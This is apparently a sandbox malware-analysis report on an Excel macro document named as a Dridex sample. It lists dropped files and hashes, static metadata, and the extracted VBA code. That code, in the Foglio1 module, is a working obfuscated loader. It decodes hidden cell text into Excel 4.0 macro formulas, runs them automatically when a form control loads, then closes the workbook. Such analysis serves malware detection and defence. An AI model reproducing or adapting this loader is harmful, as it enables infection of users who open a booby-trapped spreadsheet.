                    Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):893
                    Entropy (8bit):7.366016576663508
                    Encrypted:false
                    SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                    MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                    SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                    SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                    SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):326
                    Entropy (8bit):3.123186963792904
                    Encrypted:false
                    SSDEEP:6:kKrZwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:SkPlE99SNxAhUegeT2
                    MD5:7E0054FA6C074543BC9B37D934E8D2DF
                    SHA1:BF35F8FEE206925C323B66BCE8E35582F97AA141
                    SHA-256:DBE4735D4110A227E4A873ADC52C6A58A80929FF1B260ED44E300AF874586F2C
                    SHA-512:844BCD48869A7590E9D4B914F1654551A10B87E314C06633C48A484501E17B7DA8F80269AFA18539F7BE5DF19ACFF13BDF1D9A0414A14BD6088C043940AAE1F6
                    Malicious:false
                    Reputation:low
                    Preview: p...... ........~{..A...(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):252
                    Entropy (8bit):3.0294634724686764
                    Encrypted:false
                    SSDEEP:3:kkFklJxkSfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kK4kIliBAIdQZV7eAYLit
                    MD5:515ABC50F072563813F74B645FAA09D5
                    SHA1:5140FDCA9F17840721C22BEA2AF5B78EBA18C08E
                    SHA-256:BC1FB59C03A1BC54D0EF895C91E04B0BFD80CA55D3CA39BC311B3899EA94087B
                    SHA-512:8CEB5158E12F4D9B05EFC5C80F73F20E9CA189C02CACB2EF111414B724AB25C42C4B751956BB60C7B49DCBBA7ADB6E3C8052574AF6E57D0303B294B41DFCAA81
                    Malicious:false
                    Reputation:low
                    Preview: p...... ....`......A...(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\MAS3QXWU.htm
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                    Category:downloaded
                    Size (bytes):45017
                    Entropy (8bit):5.1653486867978575
                    Encrypted:false
                    SSDEEP:768:tqnkaQ3w/C5kmWGHbqgPiZZz/aZSO7b62pQTVPQudQQ0mpVcQrvJoOk:AnkaQ3w/C5kmWsbqgPiHz/ar7NeBPQuG
                    MD5:4B04126D788D6958C2C62DCE6FE37988
                    SHA1:1705C60E4BD29956E80BD34267F16F800037ED35
                    SHA-256:00D2F1928F6FD6B0B85CC91EB6B4EDB7A9A3A9E532C09B908E3A5ECFF2845FC0
                    SHA-512:57A0B3892F3754C57A318BEC9E789D7B6DCA4C8AECDCD66BDA864487254AB2A993F5A56495D3F3C9F4FBFD7BD75CD01FB2FE33D26A55092DED4A6E30B5996359
                    Malicious:false
                    Reputation:low
                    IE Cache URL:https://compagniamaestro.com/
                    Preview: ..<html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head>.. <meta charset="utf-8">.. <title>Reported Unsafe Site: Navigation Blocked</title>.. <style>/* Copyright (C) Microsoft Corporation. All rights reserved... * Use of this source code is governed by a BSD-style license that can be.. * found in the LICENSE file. */....html, body {.. margin: 0;.. padding: 0;.. font-family: system-ui, sans-serif;.. /* Setting font-size to 62.5% so that 1 rem = 10px. */.. font-size: 62.5%;..}....#Wrapper {.. margin-left: auto;.. margin-right: auto;.. max-width: 600px;.. padding-top: 4.8rem;.. padding-left: 4.8rem;.. padding-right: 4.8rem;.. padding-bottom: 3.2rem;..}....#branding {.. font-size: 1.2rem;.. margin-top: 0.9rem;..}.....branding-ltr {.. text-align: right;..}.....branding-rtl {.. text-align: left;..}.....red {.. background-color: #b80000..}.....whiteFont {.. color: #ffffff !important;..}.....white-pushbutton {.. display: inline-block;.. font-size: 1.5rem;.
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\841CAADE.emf
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):1976
                    Entropy (8bit):1.9759705070369498
                    Encrypted:false
                    SSDEEP:12:Yn9e/kaHslqLYp0FIQ4+P/k1EijBdShS8u1NnNlou1NRztDAcqdckgDWojkMXNVf:YniVH9a0x4I8BAKNHoKNfDn9tUs0zCp
                    MD5:1C7221B8A7104792FDEEA41E5D7BA0D0
                    SHA1:D49122E2BF94D92ED067570D638B672855C05893
                    SHA-256:76F287B1E3251B7E0E5BA27BFB05B35831150CC665DE00F9FD2D807E2D2A028D
                    SHA-512:928EF6FCCDB96A4AADD35D36171F3D09DE5605A70FE505862A294F089FEF53E697426017D3973B9BCAFF8D579A8A85C38943DCF47C5C5DD1187AB1A20D50E473
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: ....l................................... EMF........$.......................`...1........................|..F...........GDIC........dDv...............................................................................-.........!.................!.............................-.........!.................!.................!.................!...............-.........!.................!...........................................-.........!.........................$.............................-.......................................$.............................-...............'.......................................................................................!.......'.......................%...........L...d...................................!..............?...........?................................L...d...................................!..............?...........?................................'.......................%...........L...d...................................!..............?
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D1372147.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 650 x 85, 8-bit colormap, non-interlaced
                    Category:dropped
                    Size (bytes):1005
                    Entropy (8bit):7.551834228633037
                    Encrypted:false
                    SSDEEP:24:aB2uoC0w2bONUV99upE4ZXn8bf4F0T+xAlO6y:BuoBwawUV99/4ZXn8bT6AOf
                    MD5:DA5C67B7042BB04E6BFB9F60D9470287
                    SHA1:BFBDC4596111EF5D95183DB0526353CBCA84C43F
                    SHA-256:0522D7C7600F1DD56346450DFE1466BA51CFEBCD095CD3154FB30DC563F96763
                    SHA-512:D16BCF49A56F0FB926DB7C8DA413A976E1D0F53DA5EA73B729A5D11FFCF42FA149D17D3587A3DF56665C6CAAC44F903CA5D0278DCFDA8FE3C43318724C3507EE
                    Malicious:false
                    Reputation:low
                    Preview: .PNG........IHDR.......U......]5m....tEXtSoftware.Adobe ImageReadyq.e<....PLTE..........DCE.U`.......1a\...kIDATx....0.@C........E....4{...m5..#_..)%...p9:}...*.*."."."*.*.*..Y>.P.z.(..d4K...YE.G.9."."."*.`..V.e/.iAE....Q.7'..P......5.Tw58.".P...U...N}.V.QQQ#A..{..FT.a..E..Q..h.Z...>."*..Z1T..."...kT$A.H.'..G'.v..0DE.A.*.l*.>X....U...T..*...EE..y^..".N......V.5[l...:h.'P%.DE.-..M.....*B..Eh[.....E..#"...C..ZQ....K?...7t...b<o.{.*.HgNqC.Z1..u.g.-6T..m.W[.&..k........?.d..k..H..-.R+.P..w\..".C.-)e...#T.K..}...1.p..9.'Yj..."....?~.'`.I.+Z.KY."K........e..Q..*....%b.L.5.e9....}...q..pV..f..x...%..eU..]S...m...C...\..e.~T....z.....p......kT|.W..DE.HEoW...K.XBN.Q.4...%lEE.D..T...l.t..-...[/]m.......]..V+>_.~?....]..AE.FFY....9/*.....:r<,.v3.xzd....a.."..p.Cg........._V... M.......P.P......P.P......(..6..*.x.Q.N.>.\.^...N>.`7...Z....&..(!u.}hA....L\.NQ.......&...U.;.".>.Ub....2..=KkU.?"*B.........O1.u......&B........P.P....P........Zd.)e.t....IEN
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D6FDFA9C.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 415 x 291, 8-bit colormap, non-interlaced
                    Category:dropped
                    Size (bytes):5305
                    Entropy (8bit):7.83628317482236
                    Encrypted:false
                    SSDEEP:96:ndsgj5y6EGgWKW/WkPsLhsKto+bDOukamzejtjcF+6QTzys5kcWCgupHLib:ndsgjI6RdKcXOn9b9vmUgs6QXys+NYW
                    MD5:31F86AA3BD1ADA53D99B7BBEF6A1DEFC
                    SHA1:148331C2D5EB437437D48ABE51866384D7154044
                    SHA-256:E0EC55345EDC7EF4BBE4F20ABD6F8FE965475C632766FAE6CA1853674F2DC34C
                    SHA-512:96D1DC354DCB3A262B997A98E83A0162F0F9E93050C7BC952B46FB886336C1C6370B3D5A9316039FD84211161F34BA3A866B8DFD385323551743674A24FF7B39
                    Malicious:false
                    Preview: .PNG........IHDR.......#......4......tEXtSoftware.Adobe ImageReadyq.e<....PLTE.....XXX................?p.....tRNS..........Y...#IDATx....:...bz.../..EE..(?3.(.".M.5....y!\....>...O,._...I.'..|~................k........o...b(.....AW..l...>...v.ClLq....8X.....4.._...w.n_;......E..X.X$...S..q.o.l.o...e..&>4.......n.c.t.p..H.._.....n..6..eG+...~..e...?.^......q....nz....9|....M.q..R..... `.|.M.5>e'.*.>..P...m.n[.?.o.....b...dk..v}s.......m>T..B..^?......0...........]...GX.>.....\-}X._.=.vE.l`e.V>...C..h.V>.K.-4....Oo...H..(.|qR.7nT.....-.$..L..z..St.|... P^...g#.y.......|N,..|N.(...y>f94{..w...?.C.\F[Z....z+.VY..F..l.1.L.O..[....)2.G.*...n........2.P..9..~..GZ.c>..!..E} ...'...\&q.p..9.e....."r..G...>.6W..H..#.fj.+S])...H..I.|$.....:....;....".q>.L..>.m4...^.c..?c.......MF$.M>...>d.F\l...u]6...P.....Xn$6.O.>O#.N.~..8.".4^6.3.....V.N`.p...QrP....+.........h.....U.rP....."...........B.sa..U..o*.....G.j.....Q..Q.KEj..&K..Cz..5l....q!.}..o...R
                    C:\Users\user\AppData\Local\Temp\9DFE0000
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):43608
                    Entropy (8bit):7.775661687189793
                    Encrypted:false
                    SSDEEP:768:w0PwCVsTx8txX/vR1IUfSQVg4MMOo0JzAcTlrz5RzXO+iFoWZxeh9E9S:w0PHsdgFXffDOo0JzAC1t++UoWZxeh9D
                    MD5:4729F4D4D3E6A40897714474BD193698
                    SHA1:1732E41AD6A7A026F51541AF370BBEDDC3C29192
                    SHA-256:BBC203190FCC1C1C9B14E09A5A17DB8C20DFF8792DFA2F75387C66C93D36AADB
                    SHA-512:0CCFECDADDBA30755CF5BE0F4AD460E0DB09EB9F52EADBFF8D519F4D8962322B0CB520E75CAE03569389AF3903B9C1C0579F9EC4B785B1B2BBF1E6ED60743632
                    Malicious:false
                    Preview: ...n.0.E.......H...(,g..6@R.[.....HF...C.q.G....D.{.#.....u....\.....+......[..d!r#ym.....\o.[?.....&.d....X.;.<P...Ji...o}...{^...Z}b..&.1y....J.X....}$[eH.../........e..g.... .x.hM...e..D]S....=.....2...J....a..rP..ieX..g....>w.....N....<BH+...5........'.p....*.$dw...\.'dm...o....(.M..Z.5.>#.\x{k...\..<.`...I...WK./..L..R....>.'..8".......N.....C<.....4.u...s... .#Vu.....{&.......=.G....Q5.....`....I........1...-...7.H.....q....8c<,?..6.s.F.S...4'"v......i.J..l.M..........PK..........!..o..............[Content_Types].xml ...(..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Local\Temp\CabF70C.tmp
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                    Category:dropped
                    Size (bytes):58936
                    Entropy (8bit):7.994797855729196
                    Encrypted:true
                    SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                    MD5:E4F1E21910443409E81E5B55DC8DE774
                    SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                    SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                    SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                    Malicious:false
                    Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                    C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):241332
                    Entropy (8bit):4.206817415570808
                    Encrypted:false
                    SSDEEP:1536:cG2LEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cTNNSk8DtKBrpb2vxrOpprf/nVq
                    MD5:FDC005848930295BD2BEDC28CDDF4E57
                    SHA1:425ACD9C11F3ADD39533B5859DA2D4FBFC3C66EE
                    SHA-256:14D206152AB901B785CA013A80585FBA93F329324E1304DB04AA380A3C76F1A9
                    SHA-512:C70BA3D8F0643DFC3D514D573A7DA52E96BB3AB1DE4223E3CD51B34DD1B20D0E5CD493EA7710183CED563F821EF92C1CC6C63EF3BD81705D4471E71F62B593E8
                    Malicious:false
                    Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................H...4............................................................................x...I..............T............ ..P........................... ...........................................................&!..............................................................................................
                    C:\Users\user\AppData\Local\Temp\TarF70D.tmp
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):152533
                    Entropy (8bit):6.31602258454967
                    Encrypted:false
                    SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                    MD5:D0682A3C344DFC62FB18D5A539F81F61
                    SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                    SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                    SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                    Malicious:false
                    Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                    C:\Users\user\Desktop\~$Dridex-06-bc1b.xlsm
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):165
                    Entropy (8bit):1.4377382811115937
                    Encrypted:false
                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                    MD5:797869BB881CFBCDAC2064F92B26E46F
                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                    Malicious:true
                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                    Static File Info

                    General

                    File type:Microsoft Excel 2007+
                    Entropy (8bit):7.6136938439046835
                    TrID:
                    • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                    • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                    • ZIP compressed archive (8000/1) 7.58%
                    File name:Dridex-06-bc1b.xlsm
                    File size:29655
                    MD5:f72f88ebdf048fdfedf0aa3e298d9e71
                    SHA1:b8ea58415338bed65d4cd194ead6ac663ad71a6c
                    SHA256:78ccf25ecee02f759cefa6b1c29a00fb4ce64c000f7b9c04c1fc08e04d04bc1b
                    SHA512:0c6d96fcda11df417cfd48d51753d5a6334d80df04b3709ccbfc8a2d5d073822ad606da49e99c724a9d5bd16a98a623f2f9f3a2cbfe2b01bc668f44991db2903
                    SSDEEP:384:flRwzF2FBLDDBf2kbi+lj4YhX8rRI6vXO9BvGiSmDU+P4QRdUgE5cF9Y3XF:fDAFqP1u6NsrRzXO+iSkU+waSxcF9YnF
                    File Content Preview:PK..........!.c...............[Content_Types].xml ...(.........................................................................................................................................................................................................

                    File Icon

                    Icon Hash:e4e2aa8aa4bcbcac

                    Static OLE Info

                    General

                    Document Type:OpenXML
                    Number of OLE Files:2

                    OLE File "/opt/package/joesandbox/database/analysis/344478/sample/Dridex-06-bc1b.xlsm"

                    Indicators

                    Has Summary Info:False
                    Application Name:unknown
                    Encrypted Document:False
                    Contains Word Document Stream:
                    Contains Workbook/Book Stream:
                    Contains PowerPoint Document Stream:
                    Contains Visio Document Stream:
                    Contains ObjectPool Stream:
                    Flash Objects Count:
                    Contains VBA Macros:True

                    Summary

                    Author:brt
                    Last Saved By:
                    Create Time:2020-11-24T09:53:01Z
                    Last Saved Time:2020-11-24T11:16:24Z
                    Creating Application:Microsoft Excel
                    Security:0

                    Document Summary

                    Thumbnail Scaling Desired:false
                    Company:
                    Contains Dirty Links:false
                    Shared Document:false
                    Changed Hyperlinks:false
                    Application Version:16.0300

                    Streams with VBA

                    VBA File Name: Foglio1.cls, Stream Size: 2640
                    General
                    Stream Path:VBA/Foglio1
                    VBA File Name:Foglio1.cls
                    Stream Size:2640
                    Data ASCII:. . . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . p . . N . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . p a g o U n o , 1 0 , 0 , M S F o r m s , F r a m e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . .
                    Data Raw:01 16 03 00 00 12 01 00 00 fc 03 00 00 f6 00 00 00 22 02 00 00 ff ff ff ff 03 04 00 00 a7 07 00 00 00 00 00 00 01 00 00 00 70 fe ed 4e 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                    VBA Code Keywords

                    Keyword
                    PagamentoDocumento
                    VB_Name
                    VB_Creatable
                    Application.OnTime
                    VB_Exposed
                    Frame"
                    Len(n)
                    VB_Control
                    "TURN()":
                    VB_Customizable
                    "Aut"
                    ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants):
                    "=RE"
                    Replace(E,
                    "pagoUno,
                    "BarUno"
                    Chr(Asc(Mid(n,
                    Split(u,
                    PagamentoDocumento()
                    VB_TemplateDerived
                    MSForms,
                    False
                    excell()
                    excell
                    Attribute
                    Private
                    VB_PredeclaredId
                    VB_GlobalNameSpace
                    pagoUno_Layout()
                    VB_Base
                    VBA Code
                    Attribute VB_Name = "Foglio1"
                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                    Attribute VB_GlobalNameSpace = False
                    Attribute VB_Creatable = False
                    Attribute VB_PredeclaredId = True
                    Attribute VB_Exposed = True
                    Attribute VB_TemplateDerived = False
                    Attribute VB_Customizable = True
                    Attribute VB_Control = "pagoUno, 10, 0, MSForms, Frame"
                    Sub PagamentoDocumento()
                    j = "=RE"
                    m = "TURN()":
                    Sheets(1).Cells(6, 1).value = j & m: mg = "Aut"
                    Sheets(1).Cells(1, 1).Name = mg & "o_io22"
                    c = 3:
                    For Each p In ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants): n = n & p: Next
                    For X = c To Len(n) Step c
                    If (X Mod 2) Then k = -1 Else k = 1
                    u = u & Chr(Asc(Mid(n, X, 1)) + k): Next
                    IR = Split(u, "{")
                    For Each E In IR
                    Sheets(1).Cells(1, 1).value = "=" & Replace(E, "[", "J")
                    Run (mg & "o_io22")
                    Next
                    excell
                    End Sub
                    Private Sub excell()
                    Application.OnTime Now, "BarUno"
                    End Sub
                    
                    Private Sub pagoUno_Layout()
                    PagamentoDocumento
                    End Sub
                    VBA File Name: Modulo1.bas, Stream Size: 889
                    General
                    Stream Path:VBA/Modulo1
                    VBA File Name:Modulo1.bas
                    Stream Size:889
                    Data ASCII:. . . . . . . . . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 19 03 00 00 00 00 00 00 01 00 00 00 70 fe a5 6b 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                    VBA Code Keywords

                    Keyword
                    Attribute
                    VB_Name
                    BarUno()
                    ActiveWorkbook.Close
                    VBA Code
                    Attribute VB_Name = "Modulo1"
                    Sub BarUno()
                    ActiveWorkbook.Close 0
                    End Sub
                    VBA File Name: Questa_cartella_di_lavoro.cls, Stream Size: 1014
                    General
                    Stream Path:VBA/Questa_cartella_di_lavoro
                    VBA File Name:Questa_cartella_di_lavoro.cls
                    Stream Size:1014
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . p . . k . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 70 fe 1e 6b 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                    VBA Code Keywords

                    Keyword
                    "Questa_cartella_di_lavoro"
                    False
                    VB_Exposed
                    Attribute
                    VB_Name
                    VB_Creatable
                    VB_PredeclaredId
